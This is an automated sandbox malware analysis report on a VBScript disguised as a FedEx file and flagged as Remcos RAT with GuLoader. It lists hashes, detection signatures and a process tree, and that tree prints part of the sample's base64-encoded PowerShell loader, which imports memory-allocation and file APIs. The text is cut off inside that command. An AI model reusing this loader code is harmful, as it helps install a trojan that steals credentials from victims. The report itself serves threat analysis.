Edit tour
Windows
Analysis Report
775578748333_FEDEX.vbs
Overview
General Information
| Sample Name: | 775578748333_FEDEX.vbs |
| Analysis ID: | 557830 |
| MD5: | 5d3ad82ef16521df753bc6baff37f72f |
| SHA1: | ac4df3a47570b88a4768c2c461b15f78b99753dd |
| SHA256: | 19469f11cba8ab55b84cf26efa8835e906d07fdb73572c9ee3594e5c44c798bf |
| Tags: | RemcosRATvbs |
| Infos: |   |
 | |
Detection
Remcos GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Creates an autostart registry key pointing to binary in C:\Windows
Potential evasive VBS script found (sleep loop)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64
wscript.exe (PID: 7076 cmdline: C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\77557 8748333_FE DEX.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) 
powershell.exe (PID: 5616 cmdline: C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBh AGcAcgB5AC AAUwBjAHIA aQB2AGUAbg AgAHMAeQBz AHQAZQBtAG sAbwAgAFQA cgBlAGQAag BlADUAIABD AGgAcgBvAG 0AaQA4ACAA QgBJAEIATA AgAE8AdgBl AHIAcwB0AH IAZQA3ACAA cAByAGUAYw AgAEYAbwBy AGwAaQBnAH MAaQBuADIA IABCAGUAbg BlAGYAaQB0 ACAAQQBwAG 8AdABoAGUA bwBzAGkAeg AgAHUAZABl AHQAaQBsAC AATABPAE8A UwBFACAAQg ByAG4AZQB2 AGUAOQAgAF QAbwBuAHMA aQAyACAAVA ByAG8AcABp AHMAIABQAG wAZQB1AHIA bwBsAGkANA AgAGIAbABr AGsAIABDAH kAcwB0AGkA YwBlACAAVQ BuAGQAZQBy AHIAZQBwAG 8AcgAxACAA UAByAG8AYw B1AGwAYwBh AHQAIABQAE EAUwBUAE8A UgAgAFMAYQ BuAGcAIABj AG8AbQBiAG EAcgBvAG4A ZgBvACAAbw BtAHAAcgAg AEQAYQBtAG 4AZQBkADgA IABOAEUAUA BIACAARgBy AHUAaQB0AG kAdgBlAHIA ZQAgAEQARQ BGAEEASQBU AEkAUwAgAE 0AaQBzAGsA ZQBuAGQAZQ A1ACAADQAK AA0ACgANAA oAQQBkAGQA LQBUAHkAcA BlACAALQBU AHkAcABlAE QAZQBmAGkA bgBpAHQAaQ BvAG4AIABA ACIADQAKAH UAcwBpAG4A ZwAgAFMAeQ BzAHQAZQBt ADsADQAKAH UAcwBpAG4A ZwAgAFMAeQ BzAHQAZQBt AC4AUgB1AG 4AdABpAG0A ZQAuAEkAbg B0AGUAcgBv AHAAUwBlAH IAdgBpAGMA ZQBzADsADQ AKAHAAdQBi AGwAaQBjAC AAcwB0AGEA dABpAGMAIA BjAGwAYQBz AHMAIABTAG MAcgBpAHAA dABlAHIAZQ AxAA0ACgB7 AA0ACgBbAE QAbABsAEkA bQBwAG8Acg B0ACgAIgBu AHQAZABsAG wALgBkAGwA bAAiACkAXQ BwAHUAYgBs AGkAYwAgAH MAdABhAHQA aQBjACAAZQ B4AHQAZQBy AG4AIABpAG 4AdAAgAE4A dABBAGwAbA BvAGMAYQB0 AGUAVgBpAH IAdAB1AGEA bABNAGUAbQ BvAHIAeQAo AGkAbgB0AC AAUwBjAHIA aQBwAHQAZQ ByAGUANgAs AHIAZQBmAC AASQBuAHQA MwAyACAAVA BoAGUAbwBy AGkAcwBlAH IAMgAsAGkA bgB0ACAAQQ BVAFQATwBB AEMAVABJAF YARQAsAHIA ZQBmACAASQ BuAHQAMwAy ACAAUwBjAH IAaQBwAHQA ZQByAGUALA BpAG4AdAAg AEwAZQBqAG 4AaQA2ACwA aQBuAHQAIA BTAGMAcgBp AHAAdABlAH IAZQA3ACkA OwANAAoAWw BEAGwAbABJ AG0AcABvAH IAdAAoACIA awBlAHIAbg BlAGwAMwAy AC4AZABsAG wAIgApAF0A cAB1AGIAbA BpAGMAIABz AHQAYQB0AG kAYwAgAGUA eAB0AGUAcg BuACAASQBu AHQAUAB0AH IAIABDAHIA ZQBhAHQAZQ BGAGkAbABl AEEAKABzAH QAcgBpAG4A ZwAgAFAAcw BlAHUANAAs AHUAaQBuAH QAIABsAGkA bgBqAGUAcg AsAGkAbgB0 ACAAUwBUAF IAWQAsAGkA bgB0ACAAUw BjAHIAaQBw AHQAZQByAG UAMAAsAGkA bgB0ACAAUw BFAEUAUgBO AEUALABpAG 4AdAAgAFAA YQBjAGkAZg BpAGMAZQBy ADcALABpAG 4AdAAgAEEA ZAB2AGkAcw BlAG4AcwA5 ACkAOwANAA oAWwBEAGwA bABJAG0AcA BvAHIAdAAo ACIAawBlAH IAbgBlAGwA MwAyAC4AZA BsAGwAIgAp AF0AcAB1AG IAbABpAGMA IABzAHQAYQ B0AGkAYwAg AGUAeAB0AG UAcgBuACAA aQBuAHQAIA BSAGUAYQBk AEYAaQBsAG UAKABpAG4A dAAgAEEAVQ BUAE8AQQBD AFQASQBWAE UAMAAsAHUA aQBuAHQAIA BBAFUAVABP AEEAQwBUAE kAVgBFADEA LABJAG4AdA BQAHQAcgAg AEEAVQBUAE 8AQQBDAFQA SQBWAEUAMg AsAHIAZQBm ACAASQBuAH QAMwAyACAA QQBVAFQATw BBAEMAVABJ AFYARQAzAC wAaQBuAHQA IABBAFUAVA BPAEEAQwBU AEkAVgBFAD QAKQA7AA0A CgBbAEQAbA BsAEkAbQBw AG8AcgB0AC gAIgB1AHMA ZQByADMAMg AuAGQAbABs ACIAKQBdAH AAdQBiAGwA aQBjACAAcw B0AGEAdABp AGMAIABlAH gAdABlAHIA